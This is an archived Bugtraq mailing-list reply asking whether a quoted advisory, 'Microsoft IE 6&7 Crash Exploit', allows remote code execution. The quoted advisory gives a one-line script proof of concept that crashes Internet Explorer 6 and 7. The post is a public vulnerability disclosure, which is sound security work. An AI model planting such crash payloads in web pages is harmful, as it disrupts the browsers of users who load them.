lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <BLU138-DS102A19731729AB43E8FA9B55E0@phx.gbl>
Date: Wed, 27 Jan 2010 00:39:28 +0530
From: "Santhosh" <santgutz2000@...e.com>
To: <info@...uritylab.ir>, <bugtraq@...urityfocus.com>
Subject: RE: Microsoft IE 6&7 Crash Exploit

Hi,

Can this exploit be used for remote code execution???

-Santhosh

-----Original Message-----
From: info@...uritylab.ir [mailto:info@...uritylab.ir] 
Sent: Tuesday, January 26, 2010 5:06 PM
To: bugtraq@...urityfocus.com
Subject: Microsoft IE 6&7 Crash Exploit

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Microsoft IE
# Version: 6 & 7
# Tested on : XP(SP1/SP2/SP3)
#################################################################
# Vulnerability Info:
# Type: Crash
# Risk: Medium
#################################################################
Vulnerability:

IE.html
<script>document.createElement("html").outerHTML</script>
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran@...oo.com
###################################################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ